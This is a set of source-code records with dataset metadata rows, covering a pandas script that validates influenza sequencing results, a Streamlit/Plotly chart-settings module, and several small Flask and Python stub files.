df_validation['val_atypicindel'] = df_validation.apply(lambda x : list_intersect([y for y in (str(x.nextclade_aaDeletions) + "," + str(x.val_insertions)).split(',') if y not in ['', 'nan']], x.val_expectedprofile, 'missing', 100) , axis=1)
df_validation['val_result'] = df_validation.apply(lambda x : validate_result_fluabv(x.val_nextclade, x.val_dp, x.val_varcount, x.summary_hasposc, x.val_nocovsub, x.val_missingsub) , axis=1)
df_validation['val_commentary'] = df_validation.apply(lambda x : gen_commentary_fluabv(x.val_classmatch, [y for y in str(x.nextclade_aaSubstitutions).split(',') if y not in ['', 'nan'] and y[:-1] in list_profile_base], [y for y in str(x.nextclade_aaDeletions).split(',') if y not in ['', 'nan'] and y[:-1] in list_profile_base], [y for y in str(x.val_insertions).split(',') if y not in ['', 'nan'] and (y.split(':')[0] + ':') in list_profile_base], x.val_nocovsub, x.val_classcomment, x.val_atypicsub.split(';'), x.val_atypicindel.split(';')), axis=1)
df_validation['stat_simpleprofile'] = df_validation.apply(lambda x : x.val_nextclade + ' - ' + x.val_atypicsub , axis=1)
df_var_major = filter_dfrownames(df_var, ['|MAJOR'], 'keep')
df_var_major_indel = filter_dfrownames(df_var_major, ['|DEL|', '|INS|', '|COMPLEX|'], 'keep')
df_validation_sample = filter_dfrownames(df_validation, ['Tpos', 'PCR', 'NT', 'Neg', 'neg', 'T-', 'TVide', 'Tvide'], 'drop')
df_validation_control = filter_dfrownames(df_validation, ['Tpos', 'PCR', 'NT', 'Neg', 'neg', 'T-', 'TVide', 'Tvide'], 'keep')
df_validation_nt = filter_dfrownames(df_validation, ['NT', 'PCR', 'Neg', 'neg', 'T-', 'TVide', 'Tvide'], 'keep')
df_var_major_indel[df_var_major_indel > 0].count(axis=1).to_csv(args.outdir + run_date + '_' + datatype + '_indel.tsv', sep='\t', index_label='variant', header=["count"])
df_validation_control[['summary_PercCOV_S4', 'summary_PercCOV_S6', 'nextclade_clade', 'nextclade_totalAminoacidSubstitutions']].replace(r'^\s*$', np.nan, regex=True).fillna('ININT').to_csv(args.outdir + run_date + '_' + datatype + '_control.tsv', sep='\t', index_label='control')
df_validation_sample['stat_simpleprofile'].value_counts().sort_index(axis = 0).to_csv(args.outdir + run_date + '_' + datatype + '_runsummary.tsv', sep='\t', index_label='Clade')
df_metrics = pd.concat([
df_validation_sample.loc[(df_validation_sample['summary_PercCOV_S4'].apply(pd.to_numeric, errors='coerce') < args.cov_minok) & (df_validation_sample['summary_PercCOV_S6'].apply(pd.to_numeric, errors='coerce') < args.cov_minok)]['val_plate'].value_counts(),
df_validation_sample.loc[(~df_validation_sample['val_dp'].isin(['NO','NA'])) & (~df_validation_sample['val_commentary'].isin(['DSC','NA']))]['val_plate'].value_counts(),
df_validation_sample.loc[(~df_validation_sample['val_varcount'].isin(['NO','NA'])) & (~df_validation_sample['val_commentary'].isin(['DSC','NA']))]['val_plate'].value_counts(),
df_validation_sample[df_validation_sample['summary_hasposc'].isin(['FAILED'])]['val_plate'].value_counts(),
df_validation_nt.loc[(df_validation_nt['summary_PercCOV_S4'].apply(pd.to_numeric, errors='coerce') >= args.cov_maxneg) & (df_validation_nt['summary_PercCOV_S6'].apply(pd.to_numeric, errors='coerce') >= args.cov_maxneg)]['val_plate'].value_counts()],axis=1).fillna(0).astype(int)
df_metrics.columns = ['sample_cov<=' + str(args.cov_minok), 'sample_dp>=' + str(args.dp_threshold), 'sample_varcount>=' + str(args.varcount_threshold), 'sample_ci_failed', 'tneg_cov>=' + str(args.cov_maxneg)]
df_metrics.sort_index(axis = 0).to_csv(args.outdir + run_date + '_' + datatype + '_metric.tsv', sep='\t', index_label='plate')
pd.concat([df_validation[df_validation.filter(regex='summary_').columns], df_validation[df_validation.filter(regex='val_').columns], df_validation[df_validation.filter(regex='nextclade_').columns]], axis=1).to_csv(args.outdir + run_date + '_' + datatype + '_validation.tsv', sep='\t', index_label='SampleID')
df_validation_sample_notna = df_validation_sample[~df_validation_sample['summary_PercCOV_S4'].isin(['NA'])]
df_export = pd.DataFrame(df_validation_sample_notna, columns = ['val_sampleid'])
df_export['Instrument ID(s)'] = "NB552333"
df_export['Analysis authorized by'] = "laurence.josset@chu-lyon.fr"
df_export['AssayResultTargetCode'] = "GABILL"
df_export['AssayResult'] = df_validation_sample_notna.apply(lambda x : x.val_result.replace(',',';') , axis=1)
df_export.rename(columns={df_export.columns[0]: 'Sample ID'}).to_csv(args.outdir + run_date + '_' + datatype + '_fastfinder.csv', sep=',', index = False)
df_export = pd.DataFrame(df_validation_sample_notna, columns = ['val_sampleid'])
df_export['Instrument ID(s)'] = "NB552333"
df_export['Analysis authorized by'] = "laurence.josset@chu-lyon.fr"
df_export['AssayResultTargetCode'] = "COMGRAB"
df_export['AssayResult'] = df_validation_sample_notna.apply(lambda x : x.val_commentary.replace(',',';') , axis=1)
df_export.rename(columns={df_export.columns[0]: 'Sample ID'}).to_csv(args.outdir + run_date + '_' + datatype + '_fastfinder.csv', sep=',', index = False, mode='a', header=False)
| 58.134959 | 555 | 0.655693 | 4,839 | 35,753 | 4.631949 | 0.077495 | 0.087802 | 0.025698 | 0.043098 | 0.810699 | 0.789997 | 0.753012 | 0.730659 | 0.704515 | 0.695191 | 0 | 0.014821 | 0.167762 | 35,753 | 614 | 556 | 58.229642 | 0.738464 | 0.002545 | 0 | 0.540755 | 0 | 0.001988 | 0.134689 | 0.00788 | 0.021869 | 0 | 0 | 0 | 0 | 1 | 0.049702 | false | 0.007952 | 0.00994 | 0 | 0.204771 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
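The validation script above repeatedly partitions `df_validation` into samples and controls with a `filter_dfrownames(df, substrings, mode)` helper whose definition lies outside this excerpt. A minimal sketch of what such a helper plausibly does — keep or drop rows whose index name contains any of the given substrings (a hypothetical reconstruction, not the script's actual code):

```python
import pandas as pd

def filter_dfrownames(df, substrings, mode):
    """Keep ('keep') or drop ('drop') rows whose index name contains
    any of the given substrings. Hypothetical reconstruction."""
    mask = df.index.to_series().astype(str).apply(
        lambda name: any(s in name for s in substrings)
    )
    return df[mask] if mode == 'keep' else df[~mask]

# Plate-style row names: one sample, one positive control, one no-template control.
df = pd.DataFrame({'val': [1, 2, 3]},
                  index=['P1-S01_A1', 'P1-Tpos_B1', 'P1-NT_C1'])
samples = filter_dfrownames(df, ['Tpos', 'NT'], 'drop')
controls = filter_dfrownames(df, ['Tpos', 'NT'], 'keep')
```

With this reading, `df_validation_sample` is everything whose row name matches none of the control markers, and `df_validation_control` is the complement.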
f49b1ded7d4e5f4d03753ccb1cd90eb2f7ef5a2c | 43 | py | Python | auth_code.py | nivw/onna_test | 518c726a656493a5efd7ed6f548f68b2f5350260 | [
"BSD-2-Clause"
] | null | null | null | auth_code.py | nivw/onna_test | 518c726a656493a5efd7ed6f548f68b2f5350260 | [
"BSD-2-Clause"
] | null | null | null | auth_code.py | nivw/onna_test | 518c726a656493a5efd7ed6f548f68b2f5350260 | [
"BSD-2-Clause"
] | 1 | 2020-06-24T16:52:59.000Z | 2020-06-24T16:52:59.000Z | import requests
from config import config
| 10.75 | 25 | 0.837209 | 6 | 43 | 6 | 0.666667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.162791 | 43 | 3 | 26 | 14.333333 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
761e2504d6c27c36118ff42cb890b2d3a7ef8bde | 18,135 | py | Python | src/graph_controls.py | bodealamu/opencharts | 6ce5be07d998cc5affef0080b0e73f4b1be1ab42 | [
"MIT"
] | 4 | 2021-07-18T13:33:11.000Z | 2021-09-15T07:25:12.000Z | src/graph_controls.py | bodealamu/opencharts | 6ce5be07d998cc5affef0080b0e73f4b1be1ab42 | [
"MIT"
] | null | null | null | src/graph_controls.py | bodealamu/opencharts | 6ce5be07d998cc5affef0080b0e73f4b1be1ab42 | [
"MIT"
] | 1 | 2021-07-26T12:40:07.000Z | 2021-07-26T12:40:07.000Z | import streamlit as st
import plotly.express as px
from src.image_export import show_export_format
def graph_controls(chart_type, df, dropdown_options, template):
"""
Function which determines the widgets that would be shown for the different chart types
:param chart_type: str, name of chart
:param df: uploaded dataframe
:param dropdown_options: list of column names
:param template: str, representation of the selected theme
:return:
"""
length_of_options = len(dropdown_options)
length_of_options -= 1
plot = px.scatter()  # default empty figure, shown if no chart type matches or a branch raises
if chart_type == 'Scatter plots':
st.sidebar.subheader("Scatterplot Settings")
try:
x_values = st.sidebar.selectbox('X axis', index=length_of_options,options=dropdown_options)
y_values = st.sidebar.selectbox('Y axis',index=length_of_options, options=dropdown_options)
color_value = st.sidebar.selectbox("Color", index=length_of_options,options=dropdown_options)
symbol_value = st.sidebar.selectbox("Symbol",index=length_of_options, options=dropdown_options)
size_value = st.sidebar.selectbox("Size", index=length_of_options,options=dropdown_options)
hover_name_value = st.sidebar.selectbox("Hover name", index=length_of_options,options=dropdown_options)
facet_row_value = st.sidebar.selectbox("Facet row",index=length_of_options, options=dropdown_options,)
facet_column_value = st.sidebar.selectbox("Facet column", index=length_of_options,
options=dropdown_options)
marginalx = st.sidebar.selectbox("Marginal X", index=2,options=['rug', 'box', None,
'violin', 'histogram'])
marginaly = st.sidebar.selectbox("Marginal Y", index=2,options=['rug', 'box', None,
'violin', 'histogram'])
log_x = st.sidebar.selectbox('Log axis on x', options=[True, False])
log_y = st.sidebar.selectbox('Log axis on y', options=[True, False])
title = st.sidebar.text_input(label='Title of chart')
plot = px.scatter(data_frame=df,
x=x_values,
y=y_values,
color=color_value,
symbol=symbol_value,
size=size_value,
hover_name=hover_name_value,
facet_row=facet_row_value,
facet_col=facet_column_value,
log_x=log_x, log_y=log_y,marginal_y=marginaly, marginal_x=marginalx,
template=template, title=title)
except Exception as e:
print(e)
if chart_type == 'Histogram':
st.sidebar.subheader("Histogram Settings")
try:
x_values = st.sidebar.selectbox('X axis', index=length_of_options,options=dropdown_options)
y_values = st.sidebar.selectbox('Y axis',index=length_of_options, options=dropdown_options)
nbins = st.sidebar.number_input(label='Number of bins', min_value=2, value=5)
color_value = st.sidebar.selectbox("Color", index=length_of_options,options=dropdown_options)
barmode = st.sidebar.selectbox('bar mode', options=['group', 'overlay','relative'], index=2)
marginal = st.sidebar.selectbox("Marginal", index=2,options=['rug', 'box', None,
'violin', 'histogram'])
barnorm = st.sidebar.selectbox('Bar norm', options=[None, 'fraction', 'percent'], index=0)
hist_func = st.sidebar.selectbox('Histogram aggregation function', index=0,
options=['count','sum', 'avg', 'min', 'max'])
histnorm = st.sidebar.selectbox('Hist norm', options=[None, 'percent', 'probability', 'density',
'probability density'], index=0)
hover_name_value = st.sidebar.selectbox("Hover name", index=length_of_options,options=dropdown_options)
facet_row_value = st.sidebar.selectbox("Facet row",index=length_of_options, options=dropdown_options,)
facet_column_value = st.sidebar.selectbox("Facet column", index=length_of_options,
options=dropdown_options)
cummulative = st.sidebar.selectbox('Cummulative', options=[False, True])
log_x = st.sidebar.selectbox('Log axis on x', options=[True, False])
log_y = st.sidebar.selectbox('Log axis on y', options=[True, False])
title = st.sidebar.text_input(label='Title of chart')
plot = px.histogram(data_frame=df,barmode=barmode,histnorm=histnorm,
marginal=marginal,barnorm=barnorm,histfunc=hist_func,
x=x_values,y=y_values,cumulative=cummulative,
color=color_value,hover_name=hover_name_value,
facet_row=facet_row_value,nbins=nbins,
facet_col=facet_column_value,log_x=log_x,
log_y=log_y,template=template, title=title)
except Exception as e:
print(e)
# if chart_type == 'Line plots':
# st.sidebar.subheader("Line plots Settings")
#
# try:
# x_values = st.sidebar.selectbox('X axis', index=length_of_options, options=dropdown_options)
# y_values = st.sidebar.selectbox('Y axis', options=dropdown_options)
# color_value = st.sidebar.selectbox("Color", index=length_of_options, options=dropdown_options)
# line_group = st.sidebar.selectbox("Line group", options=dropdown_options)
# line_dash = st.sidebar.selectbox("Line dash", index=length_of_options,options=dropdown_options)
# hover_name_value = st.sidebar.selectbox("Hover name", index=length_of_options, options=dropdown_options)
# facet_row_value = st.sidebar.selectbox("Facet row", index=length_of_options, options=dropdown_options, )
# facet_column_value = st.sidebar.selectbox("Facet column", index=length_of_options,
# options=dropdown_options)
# log_x = st.sidebar.selectbox('Log axis on x', options=[True, False])
# log_y = st.sidebar.selectbox('Log axis on y', options=[True, False])
# title = st.sidebar.text_input(label='Title of chart')
# plot = px.line(data_frame=df,
# line_group=line_group,
# line_dash=line_dash,
# x=x_values,y=y_values,
# color=color_value,
# hover_name=hover_name_value,
# facet_row=facet_row_value,
# facet_col=facet_column_value,
# log_x=log_x,
# log_y=log_y,
# template=template,
# title=title)
# except Exception as e:
# print(e)
if chart_type == 'Violin plots':
st.sidebar.subheader('Violin plot Settings')
try:
x_values = st.sidebar.selectbox('X axis', index=length_of_options,options=dropdown_options)
y_values = st.sidebar.selectbox('Y axis',index=length_of_options, options=dropdown_options)
color_value = st.sidebar.selectbox("Color", index=length_of_options,options=dropdown_options)
violinmode = st.sidebar.selectbox('Violin mode', options=['group', 'overlay'])
box = st.sidebar.selectbox("Show box", options=[False, True])
outliers = st.sidebar.selectbox('Show points', options=[False, 'all', 'outliers', 'suspectedoutliers'])
hover_name_value = st.sidebar.selectbox("Hover name", index=length_of_options,options=dropdown_options)
facet_row_value = st.sidebar.selectbox("Facet row",index=length_of_options, options=dropdown_options,)
facet_column_value = st.sidebar.selectbox("Facet column", index=length_of_options,
options=dropdown_options)
log_x = st.sidebar.selectbox('Log axis on x', options=[True, False])
log_y = st.sidebar.selectbox('Log axis on y', options=[True, False])
title = st.sidebar.text_input(label='Title of chart')
plot = px.violin(data_frame=df,x=x_values,
y=y_values,color=color_value,
hover_name=hover_name_value,
facet_row=facet_row_value,
facet_col=facet_column_value,box=box,
log_x=log_x, log_y=log_y,violinmode=violinmode,points=outliers,
template=template, title=title)
except Exception as e:
print(e)
if chart_type == 'Box plots':
st.sidebar.subheader('Box plot Settings')
try:
x_values = st.sidebar.selectbox('X axis', index=length_of_options, options=dropdown_options)
y_values = st.sidebar.selectbox('Y axis', index=length_of_options, options=dropdown_options)
color_value = st.sidebar.selectbox("Color", index=length_of_options, options=dropdown_options)
boxmode = st.sidebar.selectbox('Box mode', options=['group', 'overlay'])
outliers = st.sidebar.selectbox('Show outliers', options=[False, 'all', 'outliers', 'suspectedoutliers'])
hover_name_value = st.sidebar.selectbox("Hover name", index=length_of_options, options=dropdown_options)
facet_row_value = st.sidebar.selectbox("Facet row", index=length_of_options, options=dropdown_options, )
facet_column_value = st.sidebar.selectbox("Facet column", index=length_of_options,
options=dropdown_options)
log_x = st.sidebar.selectbox('Log axis on x', options=[True, False])
log_y = st.sidebar.selectbox('Log axis on y', options=[True, False])
notched = st.sidebar.selectbox('Notched', options=[True, False])
title = st.sidebar.text_input(label='Title of chart')
plot = px.box(data_frame=df, x=x_values,
y=y_values, color=color_value,
hover_name=hover_name_value,facet_row=facet_row_value,
facet_col=facet_column_value, notched=notched,
log_x=log_x, log_y=log_y, boxmode=boxmode, points=outliers,
template=template, title=title)
except Exception as e:
print(e)
if chart_type == 'Sunburst':
st.sidebar.subheader('Sunburst Settings')
try:
path_value = st.sidebar.multiselect(label='Path', options=dropdown_options)
color_value = st.sidebar.selectbox(label='Color', options=dropdown_options)
value = st.sidebar.selectbox("Value", index=length_of_options, options=dropdown_options)
title = st.sidebar.text_input(label='Title of chart')
plot = px.sunburst(data_frame=df,path=path_value,values=value,
color=color_value, title=title )
except Exception as e:
print(e)
if chart_type == 'Tree maps':
st.sidebar.subheader('Tree maps Settings')
try:
path_value = st.sidebar.multiselect(label='Path', options=dropdown_options)
color_value = st.sidebar.selectbox(label='Color', options=dropdown_options)
value = st.sidebar.selectbox("Value", index=length_of_options, options=dropdown_options)
title = st.sidebar.text_input(label='Title of chart')
plot = px.treemap(data_frame=df,path=path_value,values=value,
color=color_value, title=title )
except Exception as e:
print(e)
if chart_type == 'Pie Charts':
st.sidebar.subheader('Pie Chart Settings')
try:
name_value = st.sidebar.selectbox(label='Name (Selected Column should be categorical)', options=dropdown_options)
color_value = st.sidebar.selectbox(label='Color(Selected Column should be categorical)', options=dropdown_options)
value = st.sidebar.selectbox("Value", index=length_of_options, options=dropdown_options)
hole = st.sidebar.number_input(label='Hole size (0 = full pie, up to 0.9 = donut)', min_value=0.0, max_value=0.9, value=0.0)
title = st.sidebar.text_input(label='Title of chart')
plot = px.pie(data_frame=df,names=name_value,hole=hole,
values=value,color=color_value, title=title)
except Exception as e:
print(e)
if chart_type == 'Density contour':
st.sidebar.subheader("Density contour Settings")
try:
x_values = st.sidebar.selectbox('X axis', index=length_of_options,options=dropdown_options)
y_values = st.sidebar.selectbox('Y axis',index=length_of_options, options=dropdown_options)
z_value = st.sidebar.selectbox("Z axis", index=length_of_options, options=dropdown_options)
color_value = st.sidebar.selectbox("Color", index=length_of_options,options=dropdown_options)
hist_func = st.sidebar.selectbox('Histogram aggregation function', index=0,
options=['count', 'sum', 'avg', 'min', 'max'])
histnorm = st.sidebar.selectbox('Hist norm', options=[None, 'percent', 'probability', 'density',
'probability density'], index=0)
hover_name_value = st.sidebar.selectbox("Hover name", index=length_of_options,options=dropdown_options)
facet_row_value = st.sidebar.selectbox("Facet row",index=length_of_options, options=dropdown_options,)
facet_column_value = st.sidebar.selectbox("Facet column", index=length_of_options,
options=dropdown_options)
marginalx = st.sidebar.selectbox("Marginal X", index=2,options=['rug', 'box', None,
'violin', 'histogram'])
marginaly = st.sidebar.selectbox("Marginal Y", index=2,options=['rug', 'box', None,
'violin', 'histogram'])
log_x = st.sidebar.selectbox('Log axis on x', options=[True, False],index=1)
log_y = st.sidebar.selectbox('Log axis on y', options=[True, False], index=1)
title = st.sidebar.text_input(label='Title of chart')
plot = px.density_contour(data_frame=df,x=x_values,y=y_values, color=color_value,
z=z_value, histfunc=hist_func,histnorm=histnorm,
hover_name=hover_name_value,facet_row=facet_row_value,
facet_col=facet_column_value,log_x=log_x,
log_y=log_y,marginal_y=marginaly, marginal_x=marginalx,
template=template, title=title)
except Exception as e:
print(e)
if chart_type == 'Density heatmaps':
st.sidebar.subheader("Density heatmap Settings")
try:
x_values = st.sidebar.selectbox('X axis', index=length_of_options, options=dropdown_options)
y_values = st.sidebar.selectbox('Y axis', index=length_of_options, options=dropdown_options)
z_value = st.sidebar.selectbox("Z axis", index=length_of_options, options=dropdown_options)
hist_func = st.sidebar.selectbox('Histogram aggregation function', index=0,
options=['count', 'sum', 'avg', 'min', 'max'])
histnorm = st.sidebar.selectbox('Hist norm', options=[None, 'percent', 'probability', 'density',
'probability density'], index=0)
hover_name_value = st.sidebar.selectbox("Hover name", index=length_of_options, options=dropdown_options)
facet_row_value = st.sidebar.selectbox("Facet row", index=length_of_options, options=dropdown_options, )
facet_column_value = st.sidebar.selectbox("Facet column", index=length_of_options,
options=dropdown_options)
marginalx = st.sidebar.selectbox("Marginal X", index=2, options=['rug', 'box', None,
'violin', 'histogram'])
marginaly = st.sidebar.selectbox("Marginal Y", index=2, options=['rug', 'box', None,
'violin', 'histogram'])
log_x = st.sidebar.selectbox('Log axis on x', options=[True, False], index=1)
log_y = st.sidebar.selectbox('Log axis on y', options=[True, False], index=1)
title = st.sidebar.text_input(label='Title of chart')
plot = px.density_heatmap(data_frame=df, x=x_values, y=y_values,
z=z_value, histfunc=hist_func, histnorm=histnorm,
hover_name=hover_name_value, facet_row=facet_row_value,
facet_col=facet_column_value, log_x=log_x,
log_y=log_y, marginal_y=marginaly, marginal_x=marginalx,
template=template, title=title)
except Exception as e:
print(e)
st.subheader("Chart")
st.plotly_chart(plot)
show_export_format(plot)
| 62.106164 | 126 | 0.584064 | 2,023 | 18,135 | 5.024716 | 0.073653 | 0.100935 | 0.161141 | 0.094442 | 0.829808 | 0.820758 | 0.819183 | 0.815052 | 0.792425 | 0.789769 | 0 | 0.001765 | 0.312655 | 18,135 | 291 | 127 | 62.319588 | 0.813718 | 0.110174 | 0 | 0.675926 | 0 | 0 | 0.107958 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.00463 | false | 0 | 0.013889 | 0 | 0.018519 | 0.041667 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
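`graph_controls` is one long if-chain where every branch gathers widget values and calls the matching `plotly.express` constructor. The same dispatch can be table-driven; a dependency-free sketch of the pattern (stand-in lambdas play the role of `px.scatter`, `px.histogram`, etc. — the real mapping would point at the plotly functions):

```python
# Map chart names to builder callables; in the real script these would be
# plotly.express constructors (px.scatter, px.histogram, ...).
CHART_BUILDERS = {
    'Scatter plots': lambda **kw: ('scatter', kw),
    'Histogram': lambda **kw: ('histogram', kw),
}

def build_chart(chart_type, **kwargs):
    # Fall back to the scatter builder, mirroring the px.scatter() default above.
    builder = CHART_BUILDERS.get(chart_type, CHART_BUILDERS['Scatter plots'])
    return builder(**kwargs)
```

Each branch would then shrink to collecting its widget values into `kwargs`, with the chart-type lookup handled once.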
52262f866b60d480e5f9f7028ca59ba83273c0c8 | 98 | py | Python | background/Estore/User/__init__.py | skypeee/Flask-Estore | 5f9f4a4508680cec44dc4beee308859ee274e23e | [
"MIT"
] | null | null | null | background/Estore/User/__init__.py | skypeee/Flask-Estore | 5f9f4a4508680cec44dc4beee308859ee274e23e | [
"MIT"
] | null | null | null | background/Estore/User/__init__.py | skypeee/Flask-Estore | 5f9f4a4508680cec44dc4beee308859ee274e23e | [
"MIT"
] | null | null | null | from flask.blueprints import Blueprint
user = Blueprint('User', __name__)
from User import views | 19.6 | 38 | 0.795918 | 13 | 98 | 5.692308 | 0.615385 | 0.351351 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.132653 | 98 | 5 | 39 | 19.6 | 0.870588 | 0 | 0 | 0 | 0 | 0 | 0.040404 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.666667 | 0 | 0.666667 | 0.666667 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 1 | 0 | 6 |
5239f1e42289a7b45427f7febbcde08de4725ea6 | 109 | py | Python | main.py | Adi-K-Coding/Tri3-Adi | 62a8b207fa9dbcdf7e2782de03681f87a90ad7f6 | [
"MIT"
] | null | null | null | main.py | Adi-K-Coding/Tri3-Adi | 62a8b207fa9dbcdf7e2782de03681f87a90ad7f6 | [
"MIT"
] | 4 | 2022-03-14T19:38:35.000Z | 2022-03-28T19:40:27.000Z | main.py | Adi-K-Coding/Tri3-Adi | 62a8b207fa9dbcdf7e2782de03681f87a90ad7f6 | [
"MIT"
] | null | null | null | def my_info():
print("My name is Adi, and I'm a tenth grader at Del Norte High school. ")
print(" ")
| 27.25 | 78 | 0.623853 | 20 | 109 | 3.35 | 0.9 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.247706 | 109 | 3 | 79 | 36.333333 | 0.817073 | 0 | 0 | 0 | 0 | 0 | 0.605505 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | true | 0 | 0 | 0 | 0.333333 | 0.666667 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 6 |
5258db459149450d7766f5ab39dcd24846ee4c18 | 33 | py | Python | monoweb/wsgi.py | ragnraok/MonoReader | 4672f5f0ca48f69e9180b33b62e773ab323c2cbc | [
"MIT"
] | 1 | 2019-06-12T01:46:22.000Z | 2019-06-12T01:46:22.000Z | monoweb/wsgi.py | ragnraok/MonoReader | 4672f5f0ca48f69e9180b33b62e773ab323c2cbc | [
"MIT"
] | null | null | null | monoweb/wsgi.py | ragnraok/MonoReader | 4672f5f0ca48f69e9180b33b62e773ab323c2cbc | [
"MIT"
] | null | null | null | from mono import mono_app as app
| 16.5 | 32 | 0.818182 | 7 | 33 | 3.714286 | 0.714286 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.181818 | 33 | 1 | 33 | 33 | 0.962963 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
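`monoweb/wsgi.py` only re-exports the Flask application under the name `app`, which is the callable a WSGI server (gunicorn, uWSGI, mod_wsgi) invokes with `(environ, start_response)`. A dependency-free sketch of that contract — illustrative only, not the Mono app itself:

```python
def app(environ, start_response):
    """Minimal WSGI application: the server calls this for each request."""
    body = b"Hello, WSGI"
    start_response('200 OK', [('Content-Type', 'text/plain'),
                              ('Content-Length', str(len(body)))])
    return [body]

# Tiny in-process invocation, mimicking what a WSGI server does:
captured = {}
def start_response(status, headers):
    captured['status'] = status
    captured['headers'] = headers

result = b''.join(app({}, start_response))
```

Flask's application object implements this same callable interface, which is why a one-line re-export is all the wsgi module needs.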
52723b66d10a621c38550992a15ade5aba60b121 | 32 | py | Python | rls/nn/modules/__init__.py | StepNeverStop/RLs | 25cc97c96cbb19fe859c9387b7547cbada2c89f2 | [
"Apache-2.0"
] | 371 | 2019-04-26T00:37:33.000Z | 2022-03-31T07:33:12.000Z | rls/nn/modules/__init__.py | BlueFisher/RLs | 25cc97c96cbb19fe859c9387b7547cbada2c89f2 | [
"Apache-2.0"
] | 47 | 2019-07-21T11:51:57.000Z | 2021-08-31T08:45:22.000Z | rls/nn/modules/__init__.py | BlueFisher/RLs | 25cc97c96cbb19fe859c9387b7547cbada2c89f2 | [
"Apache-2.0"
] | 102 | 2019-06-29T13:11:15.000Z | 2022-03-28T13:51:04.000Z | from .icm import CuriosityModel
| 16 | 31 | 0.84375 | 4 | 32 | 6.75 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.125 | 32 | 1 | 32 | 32 | 0.964286 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
bfeb208f8644390bc0ef38b6f6057a55d1e11fe4 | 150 | py | Python | pages/index.py | gabssanto/pizzaPy | e1fb6a1b7f4c25208a9500907913484746c22c38 | [
"MIT"
] | null | null | null | pages/index.py | gabssanto/pizzaPy | e1fb6a1b7f4c25208a9500907913484746c22c38 | [
"MIT"
] | null | null | null | pages/index.py | gabssanto/pizzaPy | e1fb6a1b7f4c25208a9500907913484746c22c38 | [
"MIT"
] | null | null | null |
from core.components.div import Div
def indexPage():
return Div(className="container", children=[
'hello', Div(children=['world'])]) | 25 | 48 | 0.653333 | 17 | 150 | 5.764706 | 0.764706 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.186667 | 150 | 6 | 49 | 25 | 0.803279 | 0 | 0 | 0 | 0 | 0 | 0.126667 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | true | 0 | 0.25 | 0.25 | 0.75 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 1 | 0 | 0 | 6 |
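`indexPage` composes nested `Div` components, but the `Div` helper itself lives in `core.components.div`, outside this excerpt. A hypothetical minimal `Div` consistent with the call signature used here (`className=...`, `children=[...]`), rendering to an HTML string — the real implementation may differ:

```python
def Div(className=None, children=None):
    """Hypothetical sketch: render a div with an optional class and string children."""
    attrs = f' class="{className}"' if className else ''
    return f'<div{attrs}>' + ''.join(children or []) + '</div>'

def indexPage():
    return Div(className="container", children=[
        'hello', Div(children=['world'])])
```

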